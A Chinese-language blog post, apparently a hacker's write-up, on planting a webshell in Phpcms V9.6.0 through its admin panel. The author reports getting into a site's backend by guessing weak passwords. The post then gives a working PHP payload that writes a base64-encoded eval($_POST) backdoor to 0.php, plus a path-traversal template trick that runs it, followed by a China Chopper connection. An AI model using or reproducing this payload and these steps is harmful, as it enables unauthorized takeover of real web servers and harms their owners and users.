PHPCMS后台低权限拿webSHELL

最近渗透遇到一个PHPCMS的系统程序版本:Phpcms V9.6.0 Release 20151225于是想起前台注册任意文件上传GETWEBSHELL漏洞,但是很遗憾该站关闭了注册功能,于是直奔后台随手试了几个弱口令之后竟然登陆成功.....于是开始了漫长的后台Getwebshell之旅。

网上很多后台拿Shell的方法多数是利用PHPSSO,但是该站始终提示Can not connect to MySQL server数据库连接出现问题,又试了通过修改模板风格模板写入一句话,但是似乎这个版本禁用了<?PHP标签,于是乎点击内容>>专题>>添加专题

QQ图片20170607001911.jpg

1. 添加专题

专题名称:test
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:

<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>


生成静态:是
专题生成目录:test000
专题子分类:test test
其他默认 -> 提交
12.jpg
2. 再次添加专题
专题名称:test1
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
专题生成目录:test111
专题子分类:test test
点击扩展设置
在专题模板处查看元素:将value值修改为 ../../../../html/special/test000/index
其他默认 -> 提交
13.jpg
 
提交后会在根目录下面生成一句话0.php,马上用菜刀连之:)
 

 

暧昧贴

发表评论

    微笑 大笑 拽 大哭 奸笑 流汗 喷血 生气 囧 不爽 晕 示爱 卖萌 吃惊 迷离 爱你 吓死了 呵呵